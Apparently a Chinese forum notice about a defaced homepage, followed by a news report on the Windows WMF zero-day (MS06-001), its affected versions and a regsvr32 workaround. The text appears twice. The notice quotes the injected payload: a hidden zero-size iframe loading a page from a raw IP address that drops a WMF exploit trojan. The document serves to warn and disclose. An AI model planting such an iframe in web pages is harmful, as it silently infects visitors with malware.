===============、
被嵌入的代码为:<iframe src=http://202.108.59.245/images/ms.htm width=0 height=0></iframe> 进入主页,会自动下载一个mm.wmf文件,如果windows系统存在MS0601漏洞,会自动运行文件,病毒名称为Exploit.Win32.IMG-WMF.u的Exploit类黒客后门木马 据国外媒体消息,本周三,多个安全公司发出警告称,运行Windows XP和Windows Server 2003系统而且进行了完全修复的电脑会轻易地黑客攻击。 安全公司证实,上述系统中新发现的破坏文件.WMF图像文件漏洞会导致黑客的攻击。安全公司把这种漏洞称为"零日",因为恶意的攻击者能很好地利用这种没有补丁的漏洞。在感染的系统上,黑客可以运行代码,即使进行了安全修复的系统也可能会受到攻击。 目前,安全公司警告,如果用户不采取如下的举措,就有可能遭受攻击,即访问恶意网站、在Windows图像和传真浏览器中打开恶意的.WMF文件、或是在Windows浏览器中预览恶意的.WMF文件等。 据VeriSign公司的快速反应小组主管Ken Dunham称,如果恶意的攻击者发现新的自动攻击手段,比如使用电子邮件、及时信息或是文件共享等形式,此类攻击活动会进一步增长。 他指出,目前被感染的电脑受到的攻击活动仅限于安装广告软件和间谍软件的层面,但是,在未来的几天内会看到特洛伊木马和更多的恶意代码开发和出现。目前,尚没有针对这种漏洞的安全补丁,他建设一些工作区把.WMF文件设为禁止状态。首先,用户可以点击任务栏的工具按钮,然后点击运行,输入"regsvr32 -u %windir%/system32/shimgvw.dll",在出现改变对话框时点击确认。 他警告,目前出现的针对.WMF的漏洞还包括.EMF文件。目前为止,通过禁止WMF文件功能可以减缓针对 Windows XP/2003的攻击行为。微软公司正在对Windows中出现的可能漏洞进行调查。微软公司公关部门的发言人Waggener Edstrom称:"经过调查后,微软将采取适当的措施保护用户的安全,措施可能会包括通过月度修复升级或是发布安全建议等,这主要取决于用户的需求。" 同时,微软建议用户采用公司的安全建议。认为自己的电脑被感染的用户可以与微软的产品支持小组取得联系。这名分析师把此漏洞列为"重要级",而 Secunia则列为"极度严重级",赛门铁克公司把这一漏洞列为"二级"威胁,"四级"是最为严重的威胁。Secunia指出,Windows Server 2003数据中心版、 Windows Server 2003企业版、Windows Server 2003标准版、Windows Server 2003网络版、 Windows XP家庭版和Windows XP专业版都存在这种漏洞。 怕辣的四川人(171159599) 19:42:10 关于页被篡改! 由于有不良人员篡改我们网站首页,请于2月11日,19:44后20点56前访问我们论坛的朋友,及时给自己的计算机检查病毒,以免造成更多损失,为此,给你带来的麻烦,我们深表歉意。对此,对不死鹰王表示感谢,及时发现问题! 被嵌入的代码为:<iframe src=http://202.108.59.245/images/ms.htm width=0 height=0></iframe> 进入主页,会自动下载一个mm.wmf文件,如果windows系统存在MS0601漏洞,会自动运行文件,病毒名称为Exploit.Win32.IMG-WMF.u的Exploit类黒客后门木马 据国外媒体消息,本周三,多个安全公司发出警告称,运行Windows XP和Windows Server 2003系统而且进行了完全修复的电脑会轻易地黑客攻击。 安全公司证实,上述系统中新发现的破坏文件.WMF图像文件漏洞会导致黑客的攻击。安全公司把这种漏洞称为"零日",因为恶意的攻击者能很好地利用这种没有补丁的漏洞。在感染的系统上,黑客可以运行代码,即使进行了安全修复的系统也可能会受到攻击。 目前,安全公司警告,如果用户不采取如下的举措,就有可能遭受攻击,即访问恶意网站、在Windows图像和传真浏览器中打开恶意的.WMF文件、或是在Windows浏览器中预览恶意的.WMF文件等。 据VeriSign公司的快速反应小组主管Ken Dunham称,如果恶意的攻击者发现新的自动攻击手段,比如使用电子邮件、及时信息或是文件共享等形式,此类攻击活动会进一步增长。 他指出,目前被感染的电脑受到的攻击活动仅限于安装广告软件和间谍软件的层面,但是,在未来的几天内会看到特洛伊木马和更多的恶意代码开发和出现。目前,尚没有针对这种漏洞的安全补丁,他建设一些工作区把.WMF文件设为禁止状态。首先,用户可以点击任务栏的工具按钮,然后点击运行,输入"regsvr32 -u %windir%/system32/shimgvw.dll",在出现改变对话框时点击确认。 他警告,目前出现的针对.WMF的漏洞还包括.EMF文件。目前为止,通过禁止WMF文件功能可以减缓针对 Windows XP/2003的攻击行为。微软公司正在对Windows中出现的可能漏洞进行调查。微软公司公关部门的发言人Waggener Edstrom称:"经过调查后,微软将采取适当的措施保护用户的安全,措施可能会包括通过月度修复升级或是发布安全建议等,这主要取决于用户的需求。" 同时,微软建议用户采用公司的安全建议。认为自己的电脑被感染的用户可以与微软的产品支持小组取得联系。这名分析师把此漏洞列为"重要级",而 Secunia则列为"极度严重级",赛门铁克公司把这一漏洞列为"二级"威胁,"四级"是最为严重的威胁。Secunia指出,Windows Server 2003数据中心版、 Windows Server 2003企业版、Windows Server 2003标准版、Windows Server 2003网络版、 Windows XP家庭版和Windows XP专业版都存在这种漏洞。